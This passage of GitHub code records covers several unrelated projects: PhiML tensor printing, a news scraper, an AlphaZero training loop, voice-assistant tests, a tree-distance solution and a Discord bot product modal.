CompressedSparseMatrix\n if isinstance(self, (SparseCoordinateTensor, CompressedSparseMatrix)):\n return sparse_summary(self, options)\n colors = options.get_colors()\n tokens = []\n if self.shape if options.include_shape is None else options.include_shape:\n tokens.append(f\"{colors.shape(self.shape)}\")\n if is_unexpected_dtype(self.dtype) if options.include_dtype is None else options.include_dtype:\n tokens.append(f\"{colors.dtype(self.dtype)}\")\n try:\n if self.rank == 0:\n tokens.append(colors.value(self.numpy()))\n elif self.dtype.kind == bool:\n tokens.append(colors.value(f\"{self.sum} / {self.shape.volume} True\"))\n elif self.dtype.kind in (float, int):\n min_val, max_val, mean, std = [float(f) for f in [self.finite_min, self.finite_max, self.finite_mean, self.std]]\n if std == 0:\n tokens.append(colors.value(f\"const {mean:{options.float_format or ''}}\"))\n else:\n if any([abs(val) < 0.001 or abs(val) > 1000 for val in [mean, std]]):\n tokens.append(colors.value(f\"{mean:{options.float_format or '.2e'}} ± {std:{options.float_format or '.1e'}}\"))\n else:\n tokens.append(colors.value(f\"{mean:{options.float_format or '.3f'}} ± {std:{options.float_format or '.3f'}}\"))\n tokens.append(colors.fine(f\"({min_val:{options.float_format or '.0e'}}...{max_val:{options.float_format or '.0e'}})\"))\n elif 
self.dtype.kind == complex:\n tokens.append(colors.value(f\"|...| < {abs(self).max}\"))\n except BaseException as err:\n tokens.append(f\"failed to fetch values: {err}\")\n return \" \".join(tokens)\n\n\ndef sparse_summary(value: Tensor, options: PrintOptions) -> str:\n colors = options.get_colors()\n from ._sparse import get_format\n tokens = []\n if is_unexpected_dtype(value.dtype) if options.include_dtype is None else options.include_dtype:\n tokens.append(f\"{colors.dtype(value.dtype)}\")\n tokens.append(\"sparse \" + get_format(value))\n if options.include_shape is not False:\n tokens.append(f\"{colors.shape(value.shape)}\")\n tokens.append(f\"with {instance(value._values).volume} entries:\")\n tokens.append(format_summary(value._values, options))\n return \" \".join(tokens)\n\n\ndef is_unexpected_dtype(dtype: DType):\n if dtype in [DType(bool), DType(int, 32)]:\n return False\n if dtype.kind == float and dtype.precision == get_precision():\n return False\n return True\n\n\ndef format_tracer(self: Tensor, options: PrintOptions) -> str:\n colors = options.get_colors()\n if self._is_tracer:\n return f\"{colors.shape(self.shape)} {colors.dtype(self.dtype)} {colors.value(f'linear tracer for {self.default_backend}')}\"\n else:\n return f\"{colors.shape(self.shape)} {colors.dtype(self.dtype)} {colors.value(f'{self.default_backend} tracer')}\"\n\n\ndef format_full(value: Tensor, options: PrintOptions) -> str: # multi-line content\n if not value.available:\n return format_tracer(value, options)\n from ._sparse import dense\n value = dense(value)\n import re\n colors = options.get_colors()\n dim_order = tuple(sorted(value.shape.spatial.names, reverse=True))\n lines = []\n formatter = {}\n if options.float_format:\n formatter['float_kind'] = ('{:' + options.float_format + '}').format\n with numpy.printoptions(threshold=np.inf, formatter=formatter):\n if value.shape.dual_rank > 0: # matrix\n if options.include_shape is not None:\n lines.append(colors.shape(value.shape))\n if value.shape.dual_rank > 1:\n corresponding_primal = value.shape.only(spatial(','.join(dual(value).names)).names, reorder=True)\n if corresponding_primal:\n value = pack_dims(value, corresponding_primal, corresponding_primal[0].dim_type('&'.join(corresponding_primal.names)))\n value = pack_dims(value, dual, dual('&'.join(value.shape.dual.names)))\n dual_dim = dual(value).name\n primal = dual(value).as_spatial().name\n if primal not in value.shape:\n primal = non_batch(value).non_dual.name\n for b in batch(value).meshgrid(names=True):\n text = \" \" + np.array2string(value[b].numpy([primal, dual_dim]), separator=', ', max_line_width=np.inf) + \" \"\n text = re.sub('[\\\\[\\\\]]', '', text).replace(',', ' ')\n prefixes = prefix_indices(non_batch(value).non_dual, colors)\n if options.include_shape is not False:\n for line, prefix in zip(text.split(\"\\n\"), prefixes):\n lines.append(f\"{prefix} {colors.value(line)} along {colors.shape(dual_dim)}\")\n else:\n lines.append(colors.value(text))\n elif value.shape.spatial_rank == 0: # no spatial or dual dimensions\n if options.include_shape is not None:\n lines.append(colors.shape(value.shape))\n if value.shape.rank <= 1:\n text = np.array2string(value.numpy(), separator=', ', max_line_width=np.inf)\n lines.append(' ' + re.sub('[\\\\[\\\\]]', '', text))\n else:\n text = np.array2string(value.numpy(value.shape), separator=', ', max_line_width=np.inf)\n lines.append(text)\n elif value.shape.spatial_rank in (1, 2):\n if value.shape.non_spatial.volume > 1:\n indices = 
[f\"{colors.shape(', '.join(f'{name}={idx}' for name, idx in index_dict.items()))}\" for index_dict in value.shape.non_spatial.meshgrid(names=True)]\n max_index_length = max(len(index) for index in indices)\n for i, index_dict in enumerate(value.shape.non_spatial.meshgrid(names=True)):\n row = \"\"\n if value.shape.non_spatial.volume > 1:\n row += indices[i] + \" \" * (max_index_length - len(indices[i]) + 2)\n if value.shape.spatial_rank == 2:\n row += \"\\n\"\n if value.shape.spatial_rank == 1:\n text = np.array2string(value[index_dict].numpy(dim_order), separator=', ', max_line_width=np.inf)\n else:\n text = \" \" + np.array2string(value[index_dict].numpy(dim_order)[::-1], separator=', ', max_line_width=np.inf)\n lines.append(row + colors.value(re.sub('[\\\\[\\\\]]', '', text)) + (f\" along {colors.shape(spatial(value))}\" if options.include_shape is not False else \"\"))\n else:\n raise NotImplementedError('Can only print tensors with up to 2 spatial dimensions.')\n return \"\\n\".join(lines)\n\n\ndef prefix_indices(index_shape, colors: ColorScheme):\n prefixes = [f\"{colors.shape(', '.join(f'{name}={idx}' for name, idx in index_dict.items()))}\" for index_dict in index_shape.meshgrid(names=True)]\n max_len = max(len(p) for p in prefixes)\n prefixes = [p + \" \" * (max_len - len(p) + 2) for p in prefixes]\n return prefixes\n\n\ndef format_row(self: Tensor, options: PrintOptions) -> str: # all values in a single line\n \"\"\"\n Including shape: (x=5, y=4) along vector\n Without shape: (5, 4)\n Auto: don't show if 'vector' but show item names\n\n Args:\n self:\n options:\n\n Returns:\n\n \"\"\"\n if not self.available:\n return format_tracer(self, options)\n from ._sparse import dense\n self = dense(self)\n colors = options.get_colors()\n if self.shape.rank == 1:\n content = _format_vector(self, options)\n is_vector = self.shape.name == 'vector' and self.shape.channel_rank == 1\n is_dual_vector = self.shape.name == '~vector'\n if (not is_vector and not is_dual_vector) if options.include_shape is None else options.include_shape:\n content += f\" along {colors.shape(f'{self.shape.name}{SUPERSCRIPT[self.shape.type]}')}\"\n elif is_dual_vector:\n content = \"~\" + content\n else:\n if channel(self):\n rows = [_format_vector(self[b], options) for b in self.shape.non_channel.meshgrid()]\n else:\n rows = [_format_number(self[b].numpy(), options, self.dtype) for b in self.shape.non_channel.meshgrid()]\n content = \"; \".join(rows)\n if options.include_shape is not False:\n content += \" \" + colors.shape(self.shape)\n if is_unexpected_dtype(self.dtype) if options.include_dtype is None else options.include_dtype:\n content += f\" {colors.dtype(self.dtype)}\"\n return content\n\n\ndef format_numpy(self: Tensor, options: PrintOptions) -> str:\n from ._sparse import dense\n self = dense(self)\n header = []\n colors = options.get_colors()\n if options.include_shape:\n header.append(colors.shape(self.shape))\n if options.include_dtype:\n header.append(colors.dtype(self.dtype))\n numpy_array = self.numpy(self.shape)\n formatter = {}\n if options.float_format:\n formatter['float_kind'] = ('{:' + options.float_format + '}').format\n with numpy.printoptions(threshold=options.threshold, formatter=formatter):\n content = colors.value(numpy_array)\n return \" \".join(header) + \"\\n\" + content if header else content\n\n\ndef _format_vector(self: Tensor, options: PrintOptions) -> str:\n colors = options.get_colors()\n if self.shape.rank > 1:\n from ._magic_ops import flatten\n self = flatten(self, 
channel('flat'))\n if self.shape.get_item_names(0) is not None and options.include_shape is not False:\n content = \", \".join([f\"{item}={_format_number(number, options, self.dtype)}\" for number, item in zip(self, self.shape.get_item_names(0))])\n else:\n content = \", \".join([_format_number(num, options, self.dtype) for num in self])\n return colors.value(f\"({content})\")\n\n\ndef _format_number(num, options: PrintOptions, dtype: DType):\n if options.float_format is not None:\n return format(num, options.float_format)\n if dtype.kind == int:\n return format(num, 'd')\n if dtype.kind == bool:\n return str(bool(num))\n if dtype.kind == float:\n return format(num, options.float_format or '.3f')\n return str(num)\n\n\ndef format_tensor(self: Tensor, options: PrintOptions) -> str:\n if not self.available:\n return format_tracer(self, options)\n if self.shape.is_non_uniform:\n return f\"{options.get_colors().shape(self.shape)} non-uniform\"\n if options.layout == 'auto':\n if not self.shape:\n return format_summary(self, options)\n if self.shape.volume is not None and self.shape.volume < options.threshold:\n return format_row(self, options)\n else:\n return format_summary(self, options)\n elif options.layout == 'summary':\n return format_summary(self, options)\n elif options.layout == 'full':\n return format_full(self, options)\n elif options.layout == 'row':\n return format_row(self, options)\n elif options.layout == 'numpy':\n return format_numpy(self, options)\n else:\n raise NotImplementedError(f\"Layout '{options.layout}' is not supported.\")\n\n\ndef is_scalar(value) -> bool:\n \"\"\"\n Checks whether `value` has no dimensions.\n\n Args:\n value: `Tensor` or Python primitive or native tensor.\n\n Returns:\n `bool`\n \"\"\"\n if isinstance(value, Tensor):\n return value.shape.rank == 0\n elif isinstance(value, numbers.Number):\n return True\n else:\n return len(choose_backend(value).staticshape(value)) == 0\n\n\ndef variable_shape(value: Tensor):\n return value._native_shape if isinstance(value, NativeTensor) else shape(value)\n\n\ndef may_vary_along(value: Tensor, dims: DimFilter):\n return variable_shape(value).only(dims).volume > 1\n\n\ndef discard_constant_dims(value: Tensor):\n non_variable = value.shape.without(variable_shape(value))\n return value[{dim: 0 for dim in non_variable.names}]\n\n\ndef specs_equal(spec1, spec2):\n if isinstance(spec1, Tensor) or isinstance(spec2, Tensor):\n if isinstance(spec1, Tensor) and isinstance(spec2, Tensor):\n from ._ops import close\n return close(spec1, spec2, rel_tolerance=0, abs_tolerance=0)\n return False\n if isinstance(spec1, dict):\n return set(spec1) == set(spec2) and all([key in spec2 and specs_equal(spec1[key], spec2[key]) for key in spec1.keys()])\n if isinstance(spec1, (tuple, list)):\n return len(spec1) == len(spec2) and all([specs_equal(s1, s2) for s1, s2 in zip(spec1, spec2)])\n return spec1 == spec2\n","repo_name":"tum-pbs/PhiML","sub_path":"phiml/math/_tensors.py","file_name":"_tensors.py","file_ext":"py","file_size_in_byte":109674,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"3"}
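The Dict class that opens the record above overloads the full set of unary, arithmetic, and comparison dunders so that a dictionary of tensors behaves elementwise, with scalars broadcast across all values. A minimal stand-alone sketch of that pattern, using a hypothetical ElemDict over plain floats rather than the real PhiML class:

# Sketch: elementwise-dict pattern. A single helper centralizes the
# Dict-vs-scalar branch that the record spells out in every operator.
class ElemDict(dict):
    def _zip(self, other, op):
        if isinstance(other, ElemDict):
            return ElemDict({k: op(v, other[k]) for k, v in self.items()})
        return ElemDict({k: op(v, other) for k, v in self.items()})  # broadcast scalar

    def __add__(self, other):
        return self._zip(other, lambda a, b: a + b)

    def __mul__(self, other):
        return self._zip(other, lambda a, b: a * b)

d = ElemDict(x=1.0, y=2.0)
print(d + d)   # {'x': 2.0, 'y': 4.0}
print(d * 10)  # {'x': 10.0, 'y': 20.0}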
+{"seq_id":"2772527240","text":"while True:\r\n melhor = soma = 0\r\n pior = 15\r\n nome = input('Nome do atleta: ')\r\n if len(nome) == 0:\r\n break\r\n for n in range(0, 7):\r\n nota = float(input('Nota: '))\r\n if nota > melhor:\r\n melhor = nota\r\n if nota < pior:\r\n pior = nota\r\n soma += nota\r\n media = (soma - (melhor + pior)) / 5\r\n print('Resultado final: ')\r\n print(f'Atleta: {nome}\\n'\r\n f'Melhor nota: {melhor}\\n'\r\n f'Pior nota: {pior}\\n'\r\n f'Media: {media}')\r\n","repo_name":"natalinoqueba/exercicios-python","sub_path":"03_EstruturaRepeticao/47_ginastica.py","file_name":"47_ginastica.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"74511380561","text":"from views.algorithms.BSM import views_black_scholes_merton\nfrom views.algorithms.ITM import views_in_the_money_calculator\nfrom views.restart import restart\n\n\ndef intro():\n print('ARKADIUS\\nAuthor: Arkadiusz Jaworski\\n\\n')\n\n\ndef tools():\n print('Choose the financial tool to run\\n')\n print('Press 1 for In The Money Algorithm')\n print('Press 2 for Black Scholes Merton Model Algorithm')\n return input('\\nSelect: ')\n\n\ndef main():\n intro()\n tool = tools()\n\n if tool == '1':\n views_in_the_money_calculator()\n elif tool == '2':\n views_black_scholes_merton()\n else:\n restart('That option is invalid.', main)\n\nif __name__ == '__main__':\n main()\n","repo_name":"arkadiuszjaworski98/financial-algorithms","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"35076957822","text":"import streamlit as st\r\nfrom streamlit_option_menu import option_menu\r\n\r\nimport home, application, experiment, contact\r\n\r\nst.set_page_config(\r\n page_title = 'Skripsi Web : IDX Clustering',\r\n page_icon = ':bar_chart:'\r\n)\r\n\r\ndef handle_active_page(active_page):\r\n if active_page == 'Home':\r\n home.launch()\r\n elif active_page == 'Application':\r\n application.launch()\r\n elif active_page == 'Experiment':\r\n experiment.launch()\r\n elif active_page == 'Contact':\r\n contact.launch()\r\n\r\nactive_page = option_menu(\r\n menu_title = 'IDX Clustering',\r\n menu_icon = 'info-square',\r\n\r\n options = ['Home', 'Application', 'Experiment', 'Contact'],\r\n icons = ['house', 'gear-wide-connected', 'code-slash', 'globe2'],\r\n\r\n default_index = 1,\r\n orientation = 'horizontal' \r\n)\r\nhandle_active_page(active_page)","repo_name":"kevinsuryapranata/cluster_idx","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"19980968178","text":"from bs4 import BeautifulSoup\nimport requests\n\ndef get_thestandard_news():\n #REQUEST FROM THE STANDARD WEBSITE\n r = requests.get('https://thestandard.co/homepage/')\n soup = BeautifulSoup(r.text, 'html.parser')\n \n #SCRAPING TRENDING NEWS : LARGEBOX AND SMALLBOX\n news = soup.find('div',{'class':'col-sm-9 fix-sticky'})\n largebox_news = news.find('div',{'class':'newsbox-large'})\n smallbox_news = news.find_all('div',{'class':'newsbox-small'})\n smallbox_news = smallbox_news[1].find_all('div',{'class':'col-sm-6 col-md-4'}) \n \n #DISPLAY INFORMATION\n category = []\n heading = []\n link = []\n \n #LARGEBOX NEWS\n largecat = largebox_news.find('div',{'class':'caption'}).find('div',{'class':'cat'}).get_text().strip()\n category.append('-' if largecat == '' else largecat)\n heading.append(largebox_news\n .find('div',{'class':'caption'})\n .find('h2',{'class':'news-title'})\n .get_text().strip())\n link.append(largebox_news\n .find('div',{'class':'caption'})\n .find('h2',{'class':'news-title'})\n .find('a').get('href'))\n \n #SMALLBOX NEWS\n for news in smallbox_news:\n smallcat = news.find('div',{'class':'caption'}).find('div',{'class':'cat'}).get_text().strip()\n category.append('-' if smallcat == '' else smallcat)\n heading.append(news.find('div',{'class':'caption'}).find('h2',{'class':'news-title'}).get_text().strip())\n link.append(news.find('div',{'class':'caption'}).find('h2',{'class':'news-title'}).find('a').get('href'))\n\n #DISPLAY \n text = ''\n for i in range(0,7):\n text = text + '{} \\ncategory: {} \\n{} \\n\\n'.format(heading[i], category[i], link[i])\n \n return text.strip()\n","repo_name":"indy041039/indyspaceapp","sub_path":"web_scraping_the_standard.py","file_name":"web_scraping_the_standard.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17921517704","text":"from collections import deque\nfrom Arena import Arena\nimport logging\n\nfrom MCTS import MCTS\nimport numpy as np\nimport time, os\nfrom pickle import Pickler, Unpickler\nimport tensorflow as tf\nimport multiprocessing\nfrom antichess3.pytorch.NNet import NNetWrapper as nn\nfrom utils_multi_proc import *\nfrom antichess3.progress.bar import *\nfrom tqdm import tqdm\nfrom antichess3.Digits import *\nimport datetime\nimport pickle\n\n\nlog = logging.getLogger(__name__)\n\n\ndef AsyncSelfPlay(game,args,iter_num,bar):\n #set gpu\n if(args.multiGPU):\n if(iter_num%2==0):\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n else:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n else:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.setGPU\n\n #set gpu memory grow\n config = tf.compat.v1.ConfigProto()\n config.gpu_options.allow_growth=True\n sess = tf.compat.v1.Session(config=config)\n\n #create nn and load weight\n net = nn(game)\n try:\n net.load_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n except:\n pass\n mcts = MCTS(game, net,args,dirichlet_noise=True)\n\n # create a list for store game state\n returnlist = []\n for i in range(args.numPerProcessSelfPlay):\n # Each process play many games, so do not need initial NN every times when process created.\n\n bar.suffix = \"iter:{i}/{x} | Total: {total:} | ETA: {eta:}\".format(i=i+1,x=args.numPerProcessSelfPlay,total=bar.elapsed_td, eta=bar.eta_td)\n bar.next()\n\n trainExamples = []\n board = game.getInitBoard()\n curPlayer = 1\n episodeStep = 0\n\n while True:\n templist = []\n episodeStep += 1\n canonicalBoard = game.getCanonicalForm(board,curPlayer)\n temp = int(episodeStep < args.tempThreshold)\n\n pi = mcts.getActionProb(canonicalBoard, temp=temp)\n sym = game.getSymmetries(canonicalBoard, pi)\n for b,p in sym:\n trainExamples.append([b, curPlayer, p, None])\n\n action = np.random.choice(len(pi), p=pi)\n board, curPlayer = game.getNextState(board, curPlayer, action)\n\n r = game.getGameEnded(board, curPlayer)\n\n if r != 0:\n templist.append(list((x[0],x[2],r*((-1)**(x[1]!=curPlayer))) for x in trainExamples))\n returnlist.append(templist)\n break\n\n\n return returnlist\n\ndef AsyncTrainNetwork(game,args,trainhistory):\n #set gpu\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.setGPU\n #create network for training\n nnet = nn(game)\n try:\n nnet.load_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n except:\n pass\n\n #---load history file---\n modelFile = os.path.join(args.checkpoint, \"trainhistory.pth.tar\")\n examplesFile = modelFile+\".examples\"\n\n if not os.path.isfile(examplesFile):\n print(examplesFile)\n else:\n print(\"File with trainExamples found. 
Read it.\")\n #print(examplesFile)\n with open(examplesFile, \"rb\") as f:\n for i in Unpickler(f).load():\n trainhistory.append(i)\n f.closed\n #----------------------\n #---delete if over limit---\n if len(trainhistory) > args.numItersForTrainExamplesHistory:\n print(\"len(trainExamplesHistory) =\", len(trainhistory), \" => remove the oldest trainExamples\")\n del trainhistory[len(trainhistory)-1]\n #-------------------\n #---extend history---\n trainExamples = []\n for e in trainhistory:\n trainExamples.extend(e)\n #---save history---\n folder = args.checkpoint\n if not os.path.exists(folder):\n os.makedirs(folder)\n filename = os.path.join(folder, 'trainhistory.pth.tar'+\".examples\")\n with open(filename, \"wb+\") as f:\n Pickler(f).dump(trainhistory)\n f.closed\n #------------------\n nnet.train(trainExamples)\n nnet.save_checkpoint(folder=args.checkpoint, filename='temp.pth.tar')\n\ndef AsyncAgainst(game,args,iter_num,bar):\n bar.suffix = \"iter:{i}/{x} | Total: {total:} | ETA: {eta:}\".format(i=iter_num+1,x=args.numAgainstPlayProcess,total=bar.elapsed_td, eta=bar.eta_td)\n bar.next()\n\n #set gpu\n if(args.multiGPU):\n if(iter_num%2==0):\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n else:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n else:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.setGPU\n\n #set gpu memory grow\n\n config = tf.compat.v1.ConfigProto()\n config.gpu_options.allow_growth=True\n sess = tf.compat.v1.Session(config=config)\n\n #create nn and load\n nnet = nn(game)\n pnet = nn(game)\n try:\n nnet.load_checkpoint(folder=args.checkpoint, filename='temp.pth.tar')\n except:\n print(\"load train model fail\")\n pass\n try:\n pnet.load_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n except:\n print(\"load old model fail\")\n pass\n pmcts = MCTS(game, pnet, args, dirichlet_noise=True)\n nmcts = MCTS(game, nnet, args, dirichlet_noise=True)\n\n arena = Arena(lambda x: np.argmax(pmcts.getActionProb(x, temp=0)),\n lambda x: np.argmax(nmcts.getActionProb(x, temp=0)), game)\n arena.displayBar = True\n # each against process play the number of numPerProcessAgainst games.\n pwins, nwins, draws = arena.playGames(args.numPerProcessAgainst)\n return pwins, nwins, draws\n\ndef CheckResultAndSaveNetwork(pwins,nwins,draws,game,args,iter_num):\n #set gpu\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.setGPU\n\n if pwins+nwins > 0 and float(nwins+(0.5*draws))/(pwins+nwins+draws) < args.updateThreshold:\n print('REJECTING NEW MODEL')\n net = nn(game)\n net.save_checkpoint(folder=args.checkpoint, filename='checkpoint_' + str(iter_num) + '.pth.tar')\n else:\n print('ACCEPTING NEW MODEL')\n net = nn(game)\n net.load_checkpoint(folder=args.checkpoint, filename='temp.pth.tar')\n net.save_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n net.save_checkpoint(folder=args.checkpoint, filename='checkpoint_' + str(iter_num) + '.pth.tar')\n\nclass Coach():\n \"\"\"\n This class executes the self-play + learning. It uses the functions defined\n in Game and NeuralNet. 
args are specified in main.py.\n \"\"\"\n def __init__(self, game, args):\n self.game = game\n self.args = args\n self.trainExamplesHistory = []\n\n def parallel_self_play(self):\n pool = multiprocessing.Pool(processes=self.args.numSelfPlayProcess)\n temp = []\n res = []\n result = []\n bar = Bar('Self Play (each process)', max=self.args.numPerProcessSelfPlay)\n\n\n for i in tqdm(range(self.args.numSelfPlayProcess),desc=\"Self Play\"):\n res.append(pool.apply_async(AsyncSelfPlay,args=(self.game,self.args,i,bar,)))\n pool.close()\n pool.join()\n for i in res:\n result.append(i.get())\n for i in result:\n for j in i:\n for trainData in j:\n temp += trainData\n return temp\n\n def parallel_train_network(self,iter_num):\n print(\"Start train network\")\n pool = multiprocessing.Pool(processes=1)\n pool.apply_async(AsyncTrainNetwork,args=(self.game,self.args,self.trainExamplesHistory,))\n pool.close()\n pool.join()\n\n def parallel_self_test_play(self,iter_num):\n pool = multiprocessing.Pool(processes=self.args.numAgainstPlayProcess)\n print(\"Start test play\")\n bar = Bar('Test Play', max=self.args.numAgainstPlayProcess)\n res = []\n result = []\n for i in range(self.args.numAgainstPlayProcess):\n res.append(pool.apply_async(AsyncAgainst,args=(self.game,self.args,i,bar)))\n pool.close()\n pool.join()\n\n pwins = 0\n nwins = 0\n draws = 0\n for i in res:\n result.append(i.get())\n for i in result:\n pwins += i[0]\n nwins += i[1]\n draws += i[2]\n\n print(\"pwin: \"+str(pwins))\n print(\"nwin: \"+str(nwins))\n print(\"draw: \"+str(draws))\n pool = multiprocessing.Pool(processes=1)\n pool.apply_async(CheckResultAndSaveNetwork,args=(pwins,nwins,draws,self.game,self.args,iter_num,))\n pool.close()\n pool.join()\n\n def learn(self):\n \"\"\"\n Performs numIters iterations with numEps episodes of self-play in each\n iteration. After every iteration, it retrains the neural network with\n examples in trainExamples (which has a maximum length of maxlenOfQueue).\n It then pits the new neural network against the old one and accepts it\n only if it wins >= updateThreshold fraction of games.\n \"\"\"\n\n for i in range(1528, self.args.numIters+1):\n print('------ITER ' + str(i) + '------')\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n temp = self.parallel_self_play()\n iterationTrainExamples += temp\n self.trainExamplesHistory.append(iterationTrainExamples)\n self.parallel_train_network(i)\n self.trainExamplesHistory.clear()\n self.parallel_self_test_play(i)","repo_name":"JernejHenigman/MasterThesisAZ","sub_path":"CoachMutliProc.py","file_name":"CoachMutliProc.py","file_ext":"py","file_size_in_byte":9226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
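CheckResultAndSaveNetwork in the record above applies the usual AlphaZero-style gate: the candidate network replaces the champion only if its score rate over the evaluation games, counting draws as half a win, reaches updateThreshold. A sketch of just that arithmetic (the 0.55 default is a typical value in alpha-zero-general-style code, assumed here rather than stated in the record; note the record accepts when no game was decisive, while this sketch conservatively rejects):

# Sketch: acceptance gate for the candidate network.
def accept_new_model(pwins, nwins, draws, update_threshold=0.55):
    games = pwins + nwins + draws
    if games == 0:
        return False  # no evidence either way -> keep the champion
    return (nwins + 0.5 * draws) / games >= update_threshold

print(accept_new_model(pwins=18, nwins=22, draws=0))  # 22/40 = 0.55 -> True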
+{"seq_id":"29035274227","text":"import alice.tests.library.auth as auth\nimport alice.tests.library.scenario as scenario\nimport alice.tests.library.surface as surface\nimport pytest\n\nfrom external_skills.common import ExternalSkillIntents\n\n\ndef _check_suggests(response):\n suggests = {s.title for s in response.suggests}\n assert 'Покажи другую' in suggests\n assert 'Включи игру' in suggests\n\n\n@pytest.mark.oauth(auth.YandexPlus)\n@pytest.mark.experiments(f'mm_enable_protocol_scenario={scenario.GameSuggest}')\n@pytest.mark.parametrize('surface', [\n surface.searchapp,\n surface.station,\n])\nclass TestGameSuggest(object):\n '''\n https://testpalm.yandex-team.ru/testcase/alice-2620\n '''\n\n owners = ('dan-anastasev',)\n\n def test_game_suggest_scenario(self, alice):\n response = alice('Посоветуй в какую игру мне поиграть')\n assert response.scenario == scenario.GameSuggest\n _check_suggests(response)\n\n response = alice('Хватит')\n assert response.scenario not in [scenario.GameSuggest, scenario.Dialogovo]\n\n response = alice('Посоветуй в какую игру мне поиграть')\n assert response.scenario == scenario.GameSuggest\n _check_suggests(response)\n\n response = alice('Покажи другую')\n assert response.scenario == scenario.GameSuggest\n _check_suggests(response)\n\n response = alice('Включи игру')\n assert response.scenario == scenario.Dialogovo\n assert response.intent == ExternalSkillIntents.Request\n\n @pytest.mark.parametrize('start', ['Давай'])\n def test_game_suggest_other_phrases(self, alice, start):\n response = alice('Посоветуй в какую игру мне поиграть')\n assert response.scenario == scenario.GameSuggest\n _check_suggests(response)\n\n response = alice(start)\n assert response.scenario == scenario.Dialogovo\n assert response.intent == ExternalSkillIntents.Request\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Voice Assistant tests/tests/integration_tests/advisers/testpalm_game_suggest.py","file_name":"testpalm_game_suggest.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"36437707775","text":"class Solution:\n def distanceK(self, root: TreeNode, target: TreeNode, K: int) -> List[int]:\n\n def dfs(node, parent):\n if node:\n node.parent = parent\n dfs(node.left, node)\n dfs(node.right, node)\n\n dfs(root, None)\n\n queue = [(target, 0)]\n seen = {target}\n\n while queue:\n if queue[0][1] == K:\n return [node.val for node, d in queue]\n node, d = queue.pop(0)\n for neighbor in (node.left, node.right, node.parent):\n if neighbor and neighbor not in seen:\n seen.add(neighbor)\n queue.append((neighbor, d+1))\n return []\n","repo_name":"sinoyuco/leetcode_solutions","sub_path":"tree/nodes_distance_k.py","file_name":"nodes_distance_k.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"13123714406","text":"import nextcord\r\nfrom hashlib import md5\r\n\r\nfrom nextcord.ext import commands, application_checks\r\nfrom datetime import datetime\r\nfrom configs.config_menager import config_get, message_get\r\nfrom database.conection import db\r\n\r\n\r\nclass Modal(nextcord.ui.Modal):\r\n def __init__(self, messages: list, bot: commands.Bot, **kwargs: nextcord.ui.text_input.TextInput):\r\n self.bot = bot\r\n self.kwargs = kwargs\r\n super().__init__(messages[\"modal\"])\r\n [self.add_item(val) for val in self.kwargs.values()]\r\n\r\n async def callback(self, interaction: nextcord.Interaction):\r\n color = config_get(\"color\")\r\n command = [self.kwargs.get(key).custom_id for key in self.kwargs.keys()]\r\n values = [self.kwargs.get(key).value for key in self.kwargs.keys()]\r\n user, channel = interaction.user, interaction.channel\r\n\r\n if command[0][:5] == \"price\":\r\n suffix = int(command[0][6:])\r\n command = command[0][:5]\r\n\r\n if \"name\" in command:\r\n hash = f\"{user.id}_{datetime.now()}\"\r\n hash = md5(hash.encode()).hexdigest()\r\n await db[\"products\"].insert_one({\r\n \"_id\": hash,\r\n \"price\": 0,\r\n \"holder\": user.id,\r\n \"name\": values[0],\r\n \"privat\": values[1],\r\n \"thread\": \"\",\r\n })\r\n\r\n messages = message_get(\"created\")\r\n emb = nextcord.Embed(title=messages[\"title\"],\r\n description=messages[\"desc\"],\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n await interaction.send(embed=emb, ephemeral=True)\r\n \r\n if command == \"price\":\r\n try:\r\n price = int(values[0])\r\n messages = message_get(\"price\")\r\n except ValueError:\r\n messages = message_get(\"error1\")\r\n return await interaction.send(messages[\"text\"], ephemeral=True)\r\n \r\n products = [i async for i in db[\"products\"].find({\"holder\": user.id, \"price\": 0})][suffix]\r\n msg = await channel.fetch_message((await db[\"users\"].find_one({\"_id\": user.id}))[\"message\"])\r\n\r\n catalog_channel = interaction.guild.get_channel(config_get(\"catalog\"))\r\n emb = nextcord.Embed(title=f\"{products['name']} - {price}$\",\r\n description=f\"id - {products['_id']}\\nauthor - {user.name}\",\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n buttons = [\r\n [\"buy\", None, nextcord.ButtonStyle.success, \"buy\", 1, None, False],\r\n [\"take off\", None, nextcord.ButtonStyle.danger, \"take_off\", 1, None, False],\r\n ]\r\n thread = await catalog_channel.create_thread(name=f\"{products['name']} - {price}$\", embed=emb, view=ViewButton(self.bot, buttons))\r\n\r\n emb = nextcord.Embed(title=messages[\"title\"],\r\n description=messages[\"desc\"],\r\n color=nextcord.Color.from_rgb(r=color[0], 